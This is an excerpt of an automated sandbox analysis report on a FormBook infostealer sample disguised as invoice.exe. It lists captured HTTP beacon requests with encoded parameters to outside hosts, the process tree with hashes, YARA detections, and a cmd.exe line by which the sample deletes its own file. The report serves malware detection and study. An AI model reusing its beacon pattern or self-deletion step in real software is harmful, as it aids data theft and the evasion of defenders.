                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 8, 2021 12:05:18.292332888 CEST | 5243 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Thu, 08 Apr 2021 10:05:18 GMT
                                                                            Server: Apache/2.4.20 (Unix) OpenSSL/1.0.1e-fips
                                                                            Content-Length: 203
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /e3rs/ was not found on this server.</p></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                            6 | 192.168.2.5 | 49734 | 192.0.78.24 | 80 | C:\Windows\explorer.exe
                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                            Apr 8, 2021 12:05:23.354604006 CEST | 5273 | OUT | GET /e3rs/?w0G=0yUiwx1wLvxUfzb5kCZXOl2J+dvoSMZhdpoUDtYYFWxv9npQwlOrxt3zkZH4aLHtWZT3&uFQl=XP7HMT_8 HTTP/1.1
                                                                            Host: www.legacyadmin.support
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 8, 2021 12:05:23.483477116 CEST | 5273 | IN | HTTP/1.1 301 Moved Permanently
                                                                            Server: nginx
                                                                            Date: Thu, 08 Apr 2021 10:05:23 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 162
                                                                            Connection: close
                                                                            Location: https://www.legacyadmin.support/e3rs/?w0G=0yUiwx1wLvxUfzb5kCZXOl2J+dvoSMZhdpoUDtYYFWxv9npQwlOrxt3zkZH4aLHtWZT3&uFQl=XP7HMT_8
                                                                            X-ac: 3.mxp _dca
                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                            Code Manipulations

                                                                            Statistics

                                                                            Behavior


                                                                            System Behavior

                                                                            General

                                                                            Start time: 12:03:22
                                                                            Start date: 08/04/2021
                                                                            Path: C:\Users\user\Desktop\invoice.exe
                                                                            Wow64 process (32bit): true
                                                                            Commandline: 'C:\Users\user\Desktop\invoice.exe'
                                                                            Imagebase: 0x800000
                                                                            File size: 894464 bytes
                                                                            MD5 hash: 492017E064CAB97DD8EA27ABD3E5CFCA
                                                                            Has elevated privileges: true
                                                                            Has administrator privileges: true
                                                                            Programmed in: .Net C# or VB.NET
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.246170025.0000000003EAC000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.246170025.0000000003EAC000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.246170025.0000000003EAC000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:low

                                                                            General

                                                                            Start time:12:03:31
                                                                            Start date:08/04/2021
                                                                            Path:C:\Users\user\Desktop\invoice.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\Desktop\invoice.exe
                                                                            Imagebase:0xd70000
                                                                            File size:894464 bytes
                                                                            MD5 hash:492017E064CAB97DD8EA27ABD3E5CFCA
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.286861103.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.286861103.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.286861103.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.287952464.0000000001B10000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.287952464.0000000001B10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.287952464.0000000001B10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:low

                                                                            General

                                                                            Start time:12:03:33
                                                                            Start date:08/04/2021
                                                                            Path:C:\Windows\explorer.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:
                                                                            Imagebase:0x7ff693d90000
                                                                            File size:3933184 bytes
                                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            General

                                                                            Start time:12:03:49
                                                                            Start date:08/04/2021
                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\SysWOW64\wscript.exe
                                                                            Imagebase:0xe0000
                                                                            File size:147456 bytes
                                                                            MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.490405309.00000000026A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.490405309.00000000026A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.490405309.00000000026A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.488897398.00000000021B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.488897398.00000000021B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.488897398.00000000021B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:high

                                                                            General

                                                                            Start time:12:03:54
                                                                            Start date:08/04/2021
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:/c del 'C:\Users\user\Desktop\invoice.exe'
                                                                            Imagebase:0x1c0000
                                                                            File size:232960 bytes
                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            General

                                                                            Start time:12:03:55
                                                                            Start date:08/04/2021
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7ecfc0000
                                                                            File size:625664 bytes
                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
